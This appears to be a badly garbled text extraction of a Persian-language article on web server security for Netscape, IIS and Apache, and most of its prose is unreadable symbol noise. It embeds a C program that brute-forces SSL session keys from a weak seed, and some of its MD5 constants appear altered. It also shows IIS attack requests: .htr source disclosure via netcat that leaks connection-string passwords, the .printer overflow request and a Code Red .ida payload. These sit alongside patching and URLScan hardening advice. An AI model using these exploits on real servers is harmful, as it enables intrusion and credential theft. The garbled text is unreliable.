a "h @ ,6 H? 3 O) -,< E % '2 http://yoursite.com/ssl/cacert.crt ? < crt \ " ,< 0 <– R •Y , $, ) - 3• H . , " U4 @ P < 5< 6 #6•Y " & 5 <0 < ") 6 3 6 @ B F ") 0, 5 'X , " j ? •Y b update 'G 3- B 5F " ) - 3•S B Netscapeb 2 0, K5 %. ? 5 5< @ ) ,6 d * SL %/ N4 ) < (E 6& \ , C 5 / SL B / ? 4 %P H" , d* 0 … ) 6,› 3 5 $%5 5! @ 6> $ ? 'X 0, 6 , F) ) SL ), < SL A) O) " 0, 5 YB* ("c – 6— 6 , 3% ! ') # —6 5< < 6 ), Nh5 -N4 # F ') # P # 7, , # 5< ) a Mozilla ) Netscape : O) # - , , " ,6 * ? O) $ ) 42 5< ) -,< - @ 5< 6 F? 0 6 b 2 `56, 5 6 3 j< 4 ) ), O) ) , CA 6 CA , < ) $ " " , < MIME \ " B' 7 # 6 - Y O) $ % !
a Galeon ) ,< ,6 3 6 2 " , –6 SL A) HTML 5F 0 " ) F) Galeon , 6 6 " $, % 5! Mozilla , 3 & 2 CH Galeon ), a Internet Explorer I'/ ) " 0 9 6 D ?@ S L @ 2 2 T % ') - 3 6 & d* , B- : IE _-, < Z> 6,G 6 3] I.12 " , F SSL %•) 4 " , — ) h @ ) - Y SL A) ? ) b ) % ' ) 0, K5 - 3• 3 , 3 6 SL 5! ,6 3 5 ! 6 2 # KE @ 6 6 ,< -,< Z> CA 0, K5 - Y 6- aC?"

#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>

typedef unsigned int UINT4;

#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21

#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))

/* ROTATE_LEFT rotates x left n bits. */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
   Rotation is separate from addition to prevent recomputation. */
#define FF(a, b, c, d, x, s, ac) { \
    (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define GG(a, b, c, d, x, s, ac) { \
    (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define HH(a, b, c, d, x, s, ac) { \
    (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }
#define II(a, b, c, d, x, s, ac) { \
    (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
    (a) = ROTATE_LEFT ((a), (s)); \
    (a) += (b); \
  }

void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
    UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d = 0x10325476, x[16];
    unsigned int i,j;

    for (i = 0, j = 0; j < 64; i++, j += 4)
        x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
               (((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);

    /* Round 1 */
    FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
    FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
    FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
    FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
    FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
    FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
    FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
    FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
    FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
    FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
    FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
    FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
    FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
    FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
    FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
    FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */

    /* Round 2 */
    GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
    GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
    GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
    GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
    GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
    GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
    GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
    GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
    GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
    GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
    GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
    GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
    GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
    GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
    GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
    GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */

    /* Round 3 */
    HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
    HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
    HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
    HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
    HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
    HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
    HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
    HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
    HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
    HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
    HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
    HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
    HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
    HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
    HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
    HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */

    /* Round 4 */
    II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
    II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
    II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
    II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
    II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
    II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
    II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
    II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
    II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
    II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
    II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
    II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
    II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
    II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
    II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
    II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */

    a += 0x67452301;
    b += 0xefcdab89;
    c += 0x98badcfe;
    d += 0x10325476;

    /* We need to swap endianness here */
    state[0] = ((unsigned char *)&a)[3];
    state[1] = ((unsigned char *)&a)[2];
    state[2] = ((unsigned char *)&a)[1];
    state[3] = ((unsigned char *)&a)[0];
    state[4] = ((unsigned char *)&b)[3];
    state[5] = ((unsigned char *)&b)[2];
    state[6] = ((unsigned char *)&b)[1];
    state[7] = ((unsigned char *)&b)[0];
    state[8] = ((unsigned char *)&c)[3];
    state[9] = ((unsigned char *)&c)[2];
    state[10] = ((unsigned char *)&c)[1];
    state[11] = ((unsigned char *)&c)[0];
    state[12] = ((unsigned char *)&d)[3];
    state[13] = ((unsigned char *)&d)[2];
    state[14] = ((unsigned char *)&d)[1];
    state[15] = ((unsigned char *)&d)[0];
}

#define mklcpr(val) ((0xdeece66d*(val)+0x2bbb62dc)>>1)

int main(int argc, char **argv)
{
    int i;
    unsigned char maybe_challenge[16], true_challenge[16];
    unsigned char key[16];
    char *p;
    unsigned long sec, usec, pid, ppid;
    unsigned char eblock[64], cblock[64];
    unsigned char *o1;
    int o2;

    if (argc == 5 && strlen(argv[4]) >= 47) {
        sec = strtol(argv[1], (char **) 0, 0);
        pid = strtol(argv[2], (char **) 0, 0);
        ppid = strtol(argv[3], (char **) 0, 0);
        p = argv[4];
        for (i=0; i<16; i++) {
            true_challenge[i] = strtol(p, &p, 16);
            p++;
        }
    } else {
        printf("Usage: %s sec pid ppid "
               "00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff\n", argv[0]);
        exit(1);
    }

    /* Set up eblock and cblock */
    for(i=0;i<64;++i) eblock[i]=0;
    eblock[8] = 0x80;
    eblock[56] = 0x40;
    for(i=0;i<64;++i) cblock[i]=0;
    cblock[16] = 0x80;
    cblock[56] = 0x80;
    ((int *)eblock)[1] = mklcpr(pid+sec+(ppid<<12));

    for (usec=0; usec < (1<<20); usec++) {
        ((int *)eblock)[0] = mklcpr(usec);
        MD5Transform1(cblock, eblock);
        o2 = 0; o1 = &(cblock[0x0f]);
        do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f);
        o2 = 0; o1 = &(cblock[0x0f]);
        do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f);
        MD5Transform1(maybe_challenge, cblock);
        if
(memcmp(maybe_challenge, true_challenge, 0x10) == 0) { printf("Found it! The key is "); o2 = 0; o1 = &(cblock[0x0f]); do { if ((*o1)++) break; --o1; } while (++o2 <= 0x0f); MD5Transform1(key, cblock); for (i=0; i<0x10; i++) printf("%2.2X ", (unsigned char) key[i]); printf("\n"); printf("usec = %lu\n", usec); exit(0); } } printf("Not found.\n"); exit(1); } Microsoft internet information server (IIS) T , ) O) 6) 2 0,< " 6b. 2 O) ? •Y B 5/ 1! M,6 -,< ;! 256) YGX$? # B) )h 4 2 +' , ,F n & n 9" IIS ) ( < 6* a I , B , ) 6=GX \ Y, YGX 6 Y1 IIS # G ) 6, i X 0,E N T) E 785/ 2 ) P1 # (DLL) # B 6 6 * ) 4 , " ! 5E H ) 6$;.P 2 @ ! 6 Y1 £ B ! B 5/ - % G N, # B ! B 5/… 3 B ! B 5/… ? IIS - P1, -,< IIS ? IIS 1Q ? #<@ - NB 4 6F 6ˆ4 b -,< K , ,F 7c L. " -) " F$showcode.asp 7 2 `56) , -,< K 0, -,< K H O) ? • Y 785/ )_MDAC/RDS]- ' & 3 3 2 " 5 - " #<@$::$DATA P <6 7 !89 " ? 0 ) # IIS 4" 56% 1 256 0 6=GX 7 - Y 7 IIS ! 5E 2 inetinfo.exe$ ,6* 0, - % ' b .prniter, , 4 % ' E " DDL 3 B'2 - TQ 0 < 6 K 7 B ) 256 ) , 6 v 4 $, 3 IIS " E B 5! 7 L3 , 4 -, < / 9 DDL " $_, < 3 F % '2 0, bP - N 4 j 40 N ISAPI 7 B 5! ( E w 3 PHP)COLdfusion I K6-, " /7 IIS S L ? " ) - 1 @ B) " - 6 B'" $IIS0, 5 ), @0 , 3 f 0, % ' $ 1 2 3 'j 4 7 5G 2 ISAPI " - Y P4 F ' R4 S @ ^ ISAPI 6 H B 5/ $n 9 2 " ,< O * " 6 ' ? 5F 6 @^ F -, 6 U ) ) ) 6% L * iX 0, 4 ) 7 # 0_URL 6=GX) 78# ) -, < - )@ o " ], 5 , 5 7 6 5$ ), 6' -, 6 U ) ) i. ) H ? 5F $ F 6 ) nH , ,F R4 S @ ^ F) N ntdll.dll webDAV SL IIS ) T#< ) =GX 3 " F 6h @ I ], N 0, 5 6 ' -, < SL T L. " N 6 ) ) " ?5F 3 - *1 7 _PHP)coldfusion $ R4 S @ ^ H $O) ( N (, !0, - 5 - Y F F) E ) ) 6URLb 6 , N) # 6, 6DLL ? 5 TG' g]dos \ " 785/ ?# $ IIS 5.0 3 I g " l '=GX " 8Q 0 )@ C _SL ] 7 L ? 56 B ) - Y $O) 2 56, -,< I N "$ 1 ) S L " U 4 IISS R 4S 6 L C85! ) - PS L B'\ 2 " " E + E'IIS 6 ) )‚ code red2 ) code red0, _U ) k " ,G , 5 -,< ;! - Y Z % .6 3 M ,6 )e ? •Y B3 3 4 RN $p ISAPI -,< ,F ) W 3 7 B 5! (&B $ ISAPI 6 B'" ) O) V < )_server side includes]SSI$_active server pages]ASP k ? 
P1] 3 ], < 7 ) X ") F ", ) & , # 4 (,! % 1 , , & IIS 1Q0_ N T L. ,< T L. 1 -handel internet server application programming interface 2 <R 1 , n 9 " 785/ 1 ) ) N , GH ) 1QZ&F P 10 I, 6, -" F -,< ? 0, - @- - Y Z < ISAPI 0 < ISAPI DLL 0, < ' & IIS O) b - 4 ' ( E ISAPI ) 785/$ < 6) & " 4 pqqp T 785/ 2 6=GX " " j* 2 N # pqqp T 2 ' 0 & % )@ = P 4 HTTP , @ - 1 @ b ISAPI DLL ) ^ ? eEye n 9" k ‹pq C P 0 @ 1Q F ' & 3 " # Digital security$pqqw ISAPI B' % # ) 4_c:\winnt\system32\msw3prt.dll] B' k #P < 6 N4 "T Q -,< " 0 printer P 4 _IPP]s # 3) h 0, - (8! $, 0, ) ) pqqw T Ÿ 0 6 B'?) " 60, , < ? ) nimda)codered ) ASP 7 .Y 0, < +P 85/ 2 % 6ISAPI DLL O) ) -,< @" <- =B* ' ,@ 'printer F ISAPI 0 ',6 3 lY 2 IPP0, 6 PF H) Ÿ HOST 3 6 2 420[buffer] 5 H H GET/NUL.printer HTTP/1.0 HOST:[buffer] "), ) < < <& ;! )_information], =GX 2 ;! , IIS) 0 < P 10, ' F- ) " , - e 'j 4 ) < ;! - IIS 1 ) 7 1/ 1P 7 L ;! $ < " , - - ) IIS # N60_ < B H B G 1/ ) , 2 pqqq O) ,4 ‚,6 H) # &F ] 3 ) IIS . [ ˆ6 ) ) ,6 Ÿ IIS 3 'L 2' R 6:3 internet printing protocol ISAPI DLL 5 printer ' & b )@ 6 3 + F) ISAPI DLL j 5 !89 ? , ,< F) ? # " %P H " ,< l ' bB g +P % '2 < " - Y , 5< +.htr 3 F) ISAPI DLL @j 5 ,< , - j 5 - 3 ) , F" G F 0, ,6 =GX $ < F IIS b <N ISM.DLL htr.txt ( F % '+ ISM.DLL -, ,< '0 ! 1/ 7 < " 3 TQ +.htr '" ?@ ? 56 -, @ + " E$ " U) ,< Ÿ 1Q 5 H 2 Q /P " • & - ;! 
) , 5< ' 3 =GX - ?@ G0 , 6 1Q 2 0 < Y bB g ' < 7 G:H$5 ) 4IIS 3 " " ISAPI DLL <) ) N F < 6- _Source Disclosure]+ % ' ISAPI DLL % '.htr, 40 , , Y E - 2 " NetCat Ÿ 0 N GET/sitel/global.asa+.htr HTTP/1.0 [CLRF] [CLRF] 5< -,< H R4 S @ ) netcat B ) 9P " - Y a, -,6 f , c:\>nc -vv www.victim.com 80<htr.txt www.victim [10.0.0.10]80(http)open 200 OK HTTP/1.0 server:microsoft-IIS/5.0 date:thu,25 jan 2001 00:50:17 GMT <!--filename=global.asa-->("profiles_connectstring") "DNS=profile;UID=company_user;password=secret" ("DB_connectstring") ="DSN=db;UID=company_user;password=secret" ="DSN=phf;UID=sa;pwd=" ("PHFconectstring") ("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas sword=simple" ("connectionstring")="DSN=company;UID=company_user;password=gu essme" ("email_pwd")="sendaemon" ="LDAP://DIRECTORY.COMPANY.COM:389" ("ldapserver") ("LDAPUSERLD")="CN=DIRECTORY ADMIN" ("LDAPPWD")="SLAPDME" ? $GLOPA.ASA% ' , T 5G 7 5<0 -,< S# ) -, & ,1 7 5B " 6P< , ,< F ISAPI DLL R4 S @ " N 4) 0 < T/0, 3 @ 56- - Y & , 3 6ISAPI DLL ,< ) ) 7 !89 7 ;! F) B , 2 560 < ;! @ MR / 0, MR / ), B !$ - 'X ? GF' B 6 E ) ? DLL 6-, <N MR/ 7 +.HTR + " -,6 Ÿ = B* A) 2 , 6 3 ;. %LY j 5 7 !89 , ‚ ISAPI : 56 +.HTR ? )&' 0 < 5 - -,< ?@ ? j 5 ;! ?@ 1P H GLOBAL.ASA % ' -,6 6 * ') PRINTER ' @ MR / (,! ) , < TG' g 5 6 D l '-, ,! 78# , < ^ I'/ IIS ) < <N DLL @ F 0, - 56DLL I'. @ ) 6% ' 6 4 B' < 15 / 785/ " :A ISAPI DLL+ A $@ CVA6 A &2S AA @ A <: $8S& IIS: + $A 8 # $ h6N 0 :;d > 3 b ; #d >> @ MN( d28 << 8 : 2 ) <N ; ! , 6% ', B$, a, , -,6 T G' g COMPUTER ) $, < ?@ 5< " 6DLL ? 4h U $, DLL PROPERTIES U O* ) •MASTER PROPERTIES •WWW SERVICE •EDIT •PROPERTIES OF THE DEFAULT WEB SITE •HOME DIRECTORY •APPLICATION SETTING •CONFIGURATION •APP MAPPINGS ?@ ) PRINTER , 4 B' MSW3PRT.DLL % '$ %#<0, N <N 6ISAPI DLL @ F) ISS N56 6DLL - 56 @" MR/ < " &2 <N R4 S @ >G " T),F , < 0 & &H " %# < , - P 1 ^ ? < + ! 
" ACTIVE SERVER .ASP BUFFER PAGES OVERFLOWS,MS02- FUNCTIONALITY 018 WEB-BASED .HTR +.HTR PASSWORD RESET SOURCE DISCLOSURE,MS01004 INTERNET .IDC 6 DATABASE ? # <@ Q193689$O) CONNECTOR SERVER-SIDE .STM,SHTM,SHTM1 ' INCLUDE & MS01-044$ ) INTERNET .PRINTER - ' PRINTER & MS01-023 ) INDEX SERVER .IDA,IDQ - ' & MS01-033$ ) FRONTPAGE UNINSTALL FPSE SERVER EXTENSION REMOTE RAD SUPPORT MS01- IUSR ' & RAD 035 SUPPORT ' ) # HOTFIX )PATCH ISAPI DLL +' , & N =B* <N 6 6 g8 0 F) MS01-026, - - R4 S @ 1 ),< 6PATCH " , -,Y -, @ 6-, 5< # @ 78# ISAPI DLL , -, < , ) SL B ) 6% 4 MR/ ISAPI DLL 78# P 9 6S % B 5F " 0 F) 78# N +' ' ) # ‹ R4 S @ () , 7 B) @] 4 ,N - %/ N < ') # A & microsoft security bulletine 5< 6 g8 2 " ( , 6 _, < 0, ,4 ' ) # $, ,F 6PATCH 0 - pqqwT R4 S @ ?@ ") _HFNETCHK.EXE] Š j 4 HFNETCHK # " % P H P 10, 6 -, < - A & ' ) # - 6? , 6 ?# 0, K5 SL ' ) # b -,< ( E -, < K 6 < " (N " ") 0,6 (E$ - ' ("c$ - Y IIS - 5 PHP P ), 6 " # GF F l '7c L. ? @ ) - @ T L. ) UPDAE WINDOWS 6U ) (N $ ' ) # 6 -, < 'X 7c L. g] -,< 'X 7c L. 2 ), \) < -, < 'X 6 ) HOTFIX i: 3 7 !89 , # j 4 -, < K PATCH 2 3@ : 5 HFNETCHK 6 XML B X ! P 1 #P< HOTFIX -, K ) PER1IIS,COULDDUSION I " 1 6 #P< " 6PATCH 2 3@ - - N4" PATCH , I 5< IIS ) ) SERVICE PACK A & ) , b g8 2 p• -, 6 ? 6PATCH % <$ bP ) ("c ? , IIS ("c ) - P ' ) # 0, 6 ( E C IIS 3 _ ') # URLSCAN,IISLOCHDOWN " - Y ISSLOCKDOWN WIZARD ( , #4 0,< )“CUSTOM’ 3 & 1/ IISS L d* 6 '$ IIS SL a T G' g 0 ISS $ l ' ^ P 6U ) 5< -, 6 U ) & d* F 3 : ' ) # $pqqw T j $ ?@ I 7 "7 B, 6 " 3) : 56) % 4 IIS “EXPERT“ u? u T5! ?# $ S -" Fa 2, 0 5 ) • P 1_NNTP,SMTP,FTP,WWW], 5 network hotfix checker 5< I - 5 -, < K b C 5! 6 5 MR/ )_,< T) , 5 7 < " $O) . 6 ISAPI • ?@ F) + 2 `56) IIS Z F " O) -, 6 U ) 0_TFTP.EXE )CMD.EXE I ] g % N ]WEBDAV ? 5 T G' ga 'X b. # EXTENSIONS ? - Y ?5F gaSCRIPT 5 T G' MAPS• _PRINTER)ISM)IDQ)HTRa I ] @ 2' R ) IIS CP - -, < - 1 c 6 ' B H" % 6 3 5 ‚, >G P 10, < ? 5 % ! N 5 E 6 PF - ) 4 3 7 L* " IIS W L* #4 #B 5! ) O) -, 6 U ) ) % 9 ? 
B F 5 ) ,< - & aURLSCAN• B' ˆ 6 6hotfix) SERVICE PACKS L - , # $, , 6 " @ ˆ6 ) IISLOCKDOWN0, & 6 PF " ) S L ) " " , 2 ,F 7 # ?@ 6& ? " URLSCAN$ -, 5 (E , "), ) IISLOCKDOWN #4 3 IISLOCKDOWN0 0,< %'g N @" @ I'. ˆ 62 `56$, 6 ) L* ) X ? 5 B3 URLSCAN L , P 1 5<0 < SL _IISLOCK.EXE] IISLOCKDOWN a, 6 ( E C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES IISLOCKDOWN n 9 " URLSCAN SL ,< N A) 0 < SL , , , ' -, ISAPI 3 5L ) ,< 37 URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN ,< ,< P 1 B' URLSCAN.DLL0 IIS # " % PH ) , , % 5! % K/ H$SL , ?56 H IIS B F ) # 4 % ' URLSCAN.INI ) , % B . ' R4 URLSCAN ISAPI b , PHTTP 3 @, \ $, % ' P 1]0 < - 3•SL URLSCAN.LOG ( ?56 3•URLSCAN.MMDDYY.LOG( - 2 #5 A & HTTP 404 OBJECT NOT v 4 , HTTP 4 P [ FOUND ' 5 URLSCAN , # 4 3 6 URLSCAN_ < 3 0, " % ' ? a 'R ,< _- g ) HEAD)POST)GET, 7 5B ] -,< , 5 H2 3 3 , , 6 3 ,G ;/P ] V # <) h … 4h … 6URL h … B', -,< & _,< 6URL NON-ASCII 6 " 3 : X nP9 , 6 >/ h … 3S >/ h … 6, @ >/ h … W L* F) d * 6 4 2 " (, 6 0, < <R URLLSCAN.INI % ' 6) < & IIS ?,< F ? " , 0 < " , - - ) IIS < b' URLSCAN.INIa # T5! " b'?@ #P< 6" , 7 " B') , - B) N " ?) 5 ? , 4 bB 4 2 ,@ #6 , ) F ? T/0, ) F) 3 -, B' ? ,63 B $ H 5 2 ) 0, • !" " #$ % - 0 H % PH " TCP SYS & 4 % 7 ) ) z 3 % j @ N$, 5 )$ < * +! - 4 & 21 ) H @ &F b' ' (! " ) 5 0% F O) ) ?@ - B' 26• c 5G 6 F) 3 %3 " 7 9P -, u (E ^P #P< 6 3 6 , < 5 V B, @ ], < %3 \) < 6 ?) 3 , * 4 , E 2 ?# 2 P 1 ) ) _€ Y + H) P[ ) V , -, •Y ? )" H)$ )0 \X & 2 ?, 5 ' B IDA/IDQ ISAPI 6, 4 ) 6-, <N NIMDA)CODE RED ( 2 0, % ) ) pqqw T + H) P [ % ', , " 3) - 1 @ " ), ' ) # " B 5/ ' & f 2 , ,F , 1 ;! ? < 3 6h) ) , 56 & 2 " R4 S @ . CODE RED ( P < B 3, <) " N ISAPI DLL TP $,< -, 6) , " pqqp -,< - 1 @‘ ‘ 6) GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0 U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7 0, E - 1 @ \X %SYSTEM%\NOTWORM 2 -, 6 ? - 1 @ CODE RED ( 2 `560, < ,4 u( 2 ,< 7# 2 N4 @V# 3 < 0, 6, 9 2 -, 6 ? 
$ - + H) P [ 6% ' 5I 7 0, < ; +!0x90 0x90 %u9090 # : ,< % ' ROOT.EXE % ' >/ - 1 @ 6% '2 `56), 560, >/ TQ ? ! X /T / "), ) % < 7 NIMDA( ,< ) % ' ,G 2 `56NIMDA)CODE RED 6 - ./0 ( 7 , ) H? , " , 8 + 5 5< , +1 2 " 34 5 6 nop " @A x86 = U4 4 78 > ? 8 6- "( 7 < -source code #' , < , :B g e '2 0 N , 6U a " SQL 7 , ‚, < " 5 5 <+ % 5< 6:3 2 B) - -N4 '%# IIS 6, ?, 5! " ^P 1#< 2 4 .INC @? 0 !89$% 5 h @ , T5! ,< 6, ( ? 4 ) j 4 I 7 R4 S @ ? 2 " %P H U 40 , < - @ , R4 S @ ) , < - 85/ 2 & 7 5B… INCLUDE B'" - Y … # . # ) ?) 0, 0 6 3 ;. %LY <) 2 9 " R4 S @ ^ @ +' F 6N 4 , )- ,4 N - # 3 ,G ;/P HTTP GET R4 S @ OK(/DEFAULT.ASP /DEFAULT.ASP+.HTR +.HTR SOURCE DISCLOSURE ERROR PERFORMING MS01-004 /FILE.STM,.SHTM,.SHTM1 WEB QUERY 500 j 4 2 ? N SOURCE MUST BE PRESENT 500 # , < R4 S @ v 4 j 4% H 200 I'. 3$, 6 ( E 5< B ! ( ,H - 3 #P< I 7 ?@ " ?5F ? 7 .X … ?5 3 , " # 7 L u2 & N Y* 7 !89 6 <… < ASP 00 ) & 7 5B$ , S# 2<) ) iX ) ? GLOBAL.ASA % ' 2<) ) .ASP, `@ H U ˆ6, >G , 0, < ) d* INTERNAL ERROR;HTML ERROR IN WEB SERVER DIRECTORY PATH DISCLOSURE ,Q193689 /NULL .PRINTER .PRINTER CONTAINS BUFFER OVERFLOW ,MS01-023 PRINTER INSTALL 200 OK;HTML CONTAINS /NULL.IDA,IDP INDEX SERVER BUFFER THE IDQ FILE..COULD NOT OVERFLOW,MS01-033 BE FOUNS 200 OK;HTML THE CONTAINS FORMAT /NULL.HTW WEBHITS OF SOURCE DISCLOSURE>MS00-006 QUERY_STRING IS INVALID 200 OK (/FILE .STM MUST BE /FILE.STM ,.SHTM,.SHTM1 SERVER PRESENT) 501 NOT IMPLEMENTED SIDE INCLUDES BUFFER OVERFLOW /_VTI_BIN/_VTI_AUT/FP30REG.DLL FRONTPAGE SERVER EXTENSION BUFFER OVERFLOW,MS01-035 a+ 1-HACKING EXPOSED –WEB APPLICATION ,JOEN SCAMBRAY,MIKE SHEMA 2-WEB HACKING –ATTACKS DEFENSE,STUART MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH 3-WWW.SRCO.IR a , , < +H ) B 5/ 6 ˆ60, -,< F 2 ) ') G O) R4 S @ " 5< (E ) 6 ) ?@ n 9 " @ ) 6 2#5 N ,< " 7, , 5 $,< 62 ) #. ) 2 2 `560 < & 21 ) , LH E ) 6) B3 0 ) $ 6$ O) () R4 S @ ) < ;. NETSCAPE) IIS)APACHE? `56 R4 S @ -, 4 2 , N N %B . ) DOS1 785/ 6 ) 'G U ) 6, H @ 15G ) 5! 
0 " 0 785/ 1 , N –denial of service B3 X / T / , G1: $, < , Y -8 j * 2 5< 56 ‚, < ,< 6 N, ) ') ) - )M 6 #< TP BPH " 3 , B3 , / ? ) " # TH APACHE 0 ) 5 O) ? , 6 U ) 78# 4 $_IIS] ) %K 0 CA-2002-17,CA-2002-] =GX - 0 6 ' " 7, , - R4 S @ ? `56) < R4 S @ ^ bP ! ) h / 6- _ ?@ l '? # 4@0, < -)8!0 4@ -, 6 U ) - Y "), ) I =B* R4 S @ ^ B! ? 5 TG' g• , ] -, 6 U • 4@ 6* ? '- 9* H U# 1) U# N & )j 5• • # " R4 ) - " -, 6 U ) 4@ Z F PL $ U 6 ) 6% '2 3 , - 9* 3) -)8! 6 „ 1 # $_27 _DOS] U ) e 'j 4 7 F) & O) -, 6 U ) "$ ?@ 6* & ) 6 " 5 " ,G ) ? 4@$ " \ 2 0 5 SL & , 5 0,< 7 3 O) 7 .Y - H , ) H8! h ?8' 6 , <R 2 3 F S1H ) , 9 , ?@ APACHE 1 )„ ,< - *1 " APACHE 1 )„ 2 56) Pc 3W 3 e ' ) #17 E E 3 - *1 ORF 3 .Y ?8' ) , -,6 4@ O) -, 6 U ) & PHP)CGI R4 S @ ^ F) 7 a ') # 3W 3 # _APACHE] " 4@ , ) 6T)„ 3W 3 S @^ 2 1 ), T25& , ! X I 2 ) 7 .Y 0, , 3 , -,6 7 .Y j 5 ) / 9 y , , 6, -" F , P 4 \ X 2 # 0 ,6 H :3 e G 0 ) 6 5 ) TQ c 9 6SLASH B ) ) MOD_DIR,MOD_NEGOTIATE 1 )„ ? " ? 1 6URL 5F c 9 MOD_AUTOINDEX ? 56 . APACHE R4 S @ 2 0 ,6 j 5 2001 h APACHE 1.3.19 * A8 ) 8 1P 5 1) B " URL 0 B3 j Y0 " B " ,4 P B g O) ) - 4 GH ) , G0, 6 j 5 ?@ B ) # 5 APACHE 6 ) , 2 0, A" 1 2< ? < Y, E #0 & URL :&i2L + $0@ , #4 B) %# 1 )„ 0 ) e 'j )$, . ' H ) , APACHE '& F) 2 %/ (, 6 ) APACHE # ) $,< , 4 B1 ˆ 60 -, @ " H APACHE ) 1 